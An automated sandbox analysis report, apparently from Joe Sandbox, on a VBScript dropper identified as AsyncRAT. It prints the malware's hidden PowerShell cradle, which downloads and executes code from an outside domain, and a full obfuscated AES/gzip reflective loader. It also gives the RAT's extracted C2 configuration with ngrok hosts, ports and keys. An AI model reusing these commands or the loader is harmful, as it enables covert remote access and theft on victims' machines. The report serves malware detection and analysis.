Edit tour
Windows
Analysis Report
7166_output.vbs
Overview
General Information
Detection
AsyncRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Register Wscript In Run Key
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Powershell decode and execute
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Performs DNS queries to domains with low reputation
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7292 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\7166_ output.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7384 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden -Command " iex (iwr - Uri https: //emptyser vices.xyz/ vbs.txt -U seBasicPar sing -Head ers @{ 'Au thorizatio n' = 'your _fixed_tok en_here' } )" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7752 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\syst em.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7808 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function fn1($p1){ $a=[System .Security. Cryptograp hy.Aes]::C reate(); $ a.Mode=[Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC; $a.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $a. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('DK2yqtn/ 8WWLFGdN0S GSXoqb0xwC 458hY3mEb0 Z8Op4='); $a.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('Tn8+Ju Q0zcIx9j+6 ZeLoqQ==') ; $d=$a.Cr eateDecryp tor(); $r= $d.Transfo rmFinalBlo ck($p1, 0, $p1.Lengt h); $d.Dis pose(); $a .Dispose() ; $r;}func tion fn2($ p2){ $m1=N ew-Object System.IO. MemoryStre am(,$p2); $m2=New-Ob ject Syste m.IO.Memor yStream; $ g=New-Obje ct System. IO.Compres sion.GZipS tream($m1, [IO.Compr ession.Com pressionMo de]::Decom press); $g .CopyTo($m 2); $g.Dis pose(); $m 1.Dispose( ); $m2.Dis pose(); $m 2.ToArray( );}functio n fn3($p3, $p4){ $a1 =[System.R eflection. Assembly]: :('daoL'[- 1..-4] -jo in '')([by te[]]$p3); $e=$a1.En tryPoint; $e.Invoke( $null, $p4 );}$p='C:\ Users\user \AppData\L ocal\Temp\ system.bat ';$host.UI .RawUI.Win dowTitle = $p;$c=[Sy stem.IO.Fi le]::('txe TllAdaeR'[ -1..-11] - join '')($ p).Split([ Environmen t]::NewLin e);foreach ($l in $c ) { if ($l .StartsWit h(':: ')) { $pl=$l.S ubstring(3 ); break; }}$pdata=[ string[]]$ pl.Split(' \');$p1=fn 2 (fn1 ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($p data[0]))) ;$p2=fn2 ( fn1 ([Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')($pdat a[1])));fn 3 $p1 $nul l;fn3 $p2 (,[string[ ]] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - wscript.exe (PID: 7956 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\laten cyx729.vbs " MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 8012 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\latency x729.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8084 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function fn1($p1){ $a=[System .Security. Cryptograp hy.Aes]::C reate(); $ a.Mode=[Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC; $a.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $a. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('DK2yqtn/ 8WWLFGdN0S GSXoqb0xwC 458hY3mEb0 Z8Op4='); $a.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('Tn8+Ju Q0zcIx9j+6 ZeLoqQ==') ; $d=$a.Cr eateDecryp tor(); $r= $d.Transfo rmFinalBlo ck($p1, 0, $p1.Lengt h); $d.Dis pose(); $a .Dispose() ; $r;}func tion fn2($ p2){ $m1=N ew-Object System.IO. MemoryStre am(,$p2); $m2=New-Ob ject Syste m.IO.Memor yStream; $ g=New-Obje ct System. IO.Compres sion.GZipS tream($m1, [IO.Compr ession.Com pressionMo de]::Decom press); $g .CopyTo($m 2); $g.Dis pose(); $m 1.Dispose( ); $m2.Dis pose(); $m 2.ToArray( );}functio n fn3($p3, $p4){ $a1 =[System.R eflection. Assembly]: :('daoL'[- 1..-4] -jo in '')([by te[]]$p3); $e=$a1.En tryPoint; $e.Invoke( $null, $p4 );}$p='C:\ Users\user \AppData\R oaming\lat encyx729.b at';$host. UI.RawUI.W indowTitle = $p;$c=[ System.IO. File]::('t xeTllAdaeR '[-1..-11] -join '') ($p).Split ([Environm ent]::NewL ine);forea ch ($l in $c) { if ( $l.StartsW ith(':: ') ) { $pl=$l .Substring (3); break ; }}$pdata =[string[] ]$pl.Split ('\');$p1= fn2 (fn1 ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $pdata[0]) ));$p2=fn2 (fn1 ([Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')($pd ata[1]))); fn3 $p1 $n ull;fn3 $p 2 (,[strin g[]] ('')) ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- wscript.exe (PID: 7104 cmdline:
"C:\Window s\system32 \wscript.e xe" "C:\Us ers\user\A ppData\Roa ming\laten cyx729.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4540 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\latency x729.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 796 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function fn1($p1){ $a=[System .Security. Cryptograp hy.Aes]::C reate(); $ a.Mode=[Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC; $a.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $a. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('DK2yqtn/ 8WWLFGdN0S GSXoqb0xwC 458hY3mEb0 Z8Op4='); $a.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('Tn8+Ju Q0zcIx9j+6 ZeLoqQ==') ; $d=$a.Cr eateDecryp tor(); $r= $d.Transfo rmFinalBlo ck($p1, 0, $p1.Lengt h); $d.Dis pose(); $a .Dispose() ; $r;}func tion fn2($ p2){ $m1=N ew-Object System.IO. MemoryStre am(,$p2); $m2=New-Ob ject Syste m.IO.Memor yStream; $ g=New-Obje ct System. IO.Compres sion.GZipS tream($m1, [IO.Compr ession.Com pressionMo de]::Decom press); $g .CopyTo($m 2); $g.Dis pose(); $m 1.Dispose( ); $m2.Dis pose(); $m 2.ToArray( );}functio n fn3($p3, $p4){ $a1 =[System.R eflection. Assembly]: :('daoL'[- 1..-4] -jo in '')([by te[]]$p3); $e=$a1.En tryPoint; $e.Invoke( $null, $p4 );}$p='C:\ Users\user \AppData\R oaming\lat encyx729.b at';$host. UI.RawUI.W indowTitle = $p;$c=[ System.IO. File]::('t xeTllAdaeR '[-1..-11] -join '') ($p).Split ([Environm ent]::NewL ine);forea ch ($l in $c) { if ( $l.StartsW ith(':: ') ) { $pl=$l .Substring (3); break ; }}$pdata =[string[] ]$pl.Split ('\');$p1= fn2 (fn1 ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $pdata[0]) ));$p2=fn2 (fn1 ([Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')($pd ata[1]))); fn3 $p1 $n ull;fn3 $p 2 (,[strin g[]] ('')) ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- wscript.exe (PID: 1160 cmdline:
"C:\Window s\system32 \wscript.e xe" "C:\Us ers\user\A ppData\Roa ming\laten cyx729.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1612 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\latency x729.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1840 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function fn1($p1){ $a=[System .Security. Cryptograp hy.Aes]::C reate(); $ a.Mode=[Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC; $a.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $a. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('DK2yqtn/ 8WWLFGdN0S GSXoqb0xwC 458hY3mEb0 Z8Op4='); $a.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('Tn8+Ju Q0zcIx9j+6 ZeLoqQ==') ; $d=$a.Cr eateDecryp tor(); $r= $d.Transfo rmFinalBlo ck($p1, 0, $p1.Lengt h); $d.Dis pose(); $a .Dispose() ; $r;}func tion fn2($ p2){ $m1=N ew-Object System.IO. MemoryStre am(,$p2); $m2=New-Ob ject Syste m.IO.Memor yStream; $ g=New-Obje ct System. IO.Compres sion.GZipS tream($m1, [IO.Compr ession.Com pressionMo de]::Decom press); $g .CopyTo($m 2); $g.Dis pose(); $m 1.Dispose( ); $m2.Dis pose(); $m 2.ToArray( );}functio n fn3($p3, $p4){ $a1 =[System.R eflection. Assembly]: :('daoL'[- 1..-4] -jo in '')([by te[]]$p3); $e=$a1.En tryPoint; $e.Invoke( $null, $p4 );}$p='C:\ Users\user \AppData\R oaming\lat encyx729.b at';$host. UI.RawUI.W indowTitle = $p;$c=[ System.IO. File]::('t xeTllAdaeR '[-1..-11] -join '') ($p).Split ([Environm ent]::NewL ine);forea ch ($l in $c) { if ( $l.StartsW ith(':: ') ) { $pl=$l .Substring (3); break ; }}$pdata =[string[] ]$pl.Split ('\');$p1= fn2 (fn1 ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $pdata[0]) ));$p2=fn2 (fn1 ([Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')($pd ata[1]))); fn3 $p1 $n ull;fn3 $p 2 (,[strin g[]] ('')) ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
{"Server": "127.0.0.1,2.tcp.eu.ngrok.io,5.tcp.eu.ngrok.io", "Ports": "6606,7707,8808,2024,15509,11979", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "tzJ4ixWXqg05Z41j3M2aYP0mUJFp5MUr", "Mutex": "rBBszd57Gkh8", "Certificate": "MIIE2jCCAsKgAwIBAgIQAPgzNYA4QfZ/YXIUiuJyEzANBgkqhkiG9w0BAQ0FADAOMQwwCgYDVQQDDANhbW8wIBcNMjQxMDE1MTkyMzMyWhgPOTk5OTEyMzEyMzU5NTlaMA4xDDAKBgNVBAMMA2FtbzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIm6e8BlCAIZX1BDUarpG2Yz127lZ/wQyIBcO8wPaZD7bx906FsesyqIU1rfHL/BurYA2luimBKti4kDYL0R/xVsyEtVNsOYk3o0auyDzKLEr6U2QAt+TReAL6My0UbAG4eQUN82h5MEr2AjzPEIg8wjk3W+nxYhHuWlfv5IKbOoEH87+C6TZPzWqccdmteGQV3mF6F4qpAxP33V7RHCqMrdABuQsN2gW3gsYGn+5w3wKXpiO4ZO3q932FoFCw73l9AReNd2OFBdPITKUwNUGqoMZvydJ8VcyMBmyKwIfhv5jXfek7FPiCPjj/74Hd0y0Lza1W4dhs0qcoRK+qbbm/Y9XjLybvnsZFDhaFm2b3X2SiIQkIvabxv2FyYmm0QWklO6KJonRs3f8q/wtWB6Hit/pHqZtXODd1qMhi8t0JGcfupA8+JpfJDWNewDWyCq4ym5lJc2+JEyP3GxF+pMQzNigeHI5YzBdnpZJ48ZNwyS1Qa913Fn4m6ObJStW+h0ZTFKR6BjtFJjxDydKalTTaE/QqL6hplBdjCpl5uT6zFSrBjVcUvgg7U+/zLj8skasOXhcl4D+LmONJIIViwyDxfyOe/ip77u4mu62ZLmP+6q2QcD155qPwcUzf3/Jgrpuw8IOu42OGUjMQUvlAebXiHUCZttF+BU+U+zdXun7m4vAgMBAAGjMjAwMB0GA1UdDgQWBBSF0oJYvotAZgyUDSQsZyu+WmwIZzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAFe4nSXppGJ6rM6Y6KG3s+UC5sG+Ee4W7J4SNvUhBJirDqh5yb665SsKMAQG8tNPCCZiQqcfuu/W+93402ghG+fZZnc2iCmUBslFjBaMVY0yja9mu7CDSTzDcYN66U9/6T6GCExvTaMyZJygCtMtdZUhR6R3QULBA+6o/EQyY32On2tM1qgOdycD6Bofomf1miYJi/QE4/huFU3q5PZZptXKXqgRHjQBFxrFeO1bGeM82LywUR2z9Ua/QE7A6aVfSlLiQKcMEgcCBiC/UxppFr0ATE8fAOlDFAU3MJqYlIwI8xf6VxlNRvTewBWhxjCuNllsEggGlPGdpRFMNIvMuM7gnF5nUT3/ux2MKE4GWeyEMi02RkxMypPhrIAnmL6Q9f/5hmEwZwaZROCTgealcf0/IbEjSGg5vVpLyB/cGDw7RLq4x32lYuf3yVDJrymM5fTPSRxKJ4vc6tYTfijdaiQTlBj1b5FxUfcIM0B2l0hR4H4JYFHkCc3Q+Z45V+ptojwOwbylopC8R253AIi9ySrN6hKLKY5cMeXAVSo1D+vkLZjWRq1JiIb3xSC3ZtecFH8sdqSEooy9pOF6FMuQ2f7JvvrOqSzIeYAoZyUZfspsrtpfajsT9KmzxgWJLozPgi0qx/BFjloZNDTVbhpGMC9ZupGXA3h1dpenT3eEBayQ==", "ServerSignature": "NUmfsSadQvkczqAhF/9uV+v9Q8vtkclzlk/KjT7GgG74zOfuse415+z83xypqa0bQrisRPFyGOFCnT4taxIgvOrfdzOYneaVH9dIo/RyKNfMjnDS2UzpWEdkH0nqPLN6czpGhcngv93ulxOrnnTTbSz5uQywcWzNe+7pfXD0mYABOgH76rlOiJsrYZzwua+ASvQ1KuXuYo8eAU5+lIk1HETulFpYE5WM/jVtB/BAhW+QFleOrUhFZm3aGPyjp2Mh6u0JPDLSV8gbGs3I5GFGC9ECmoybDsKr18V13rswTIHwR9VJEJvAd9yFUlZBFgnAmpUM9TGvIE7Mo87jJrx+4harqguUXSnB+wgKc4XRkQ+wJEqcl7dnRMMmkZZDhfKGpA3spSmsyca9HrV8PXqeBGrNufLAz6mwp5DWSUTxPxbjaf88ltxLHCMb8v+iTL0jwWgRUTUT8Le93xuo0v6s9lhl2i98OhFVMPE9oXEm9l1xDJCGb52U9sdfS0GFBXnfMtGwyHDSDkgOb1mTexu+tgk1/kHKaibFBpncAbZwXO64I6RQVxLY9B0oi0pekPL08xOF/QAWH2h2kcxMmXBir8zwWvmcyPtIhTsMx6x1DYjAqmSftYknSDLHJ2d0yj4GoAhR9K+FzFQOOmHc95yL9QsGIMY1dpvNLJaPkUpCavg=", "BDOS": "false", "External_config_on_Pastebin": "null"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen |
| |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen |
| |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Thomas Patzke: |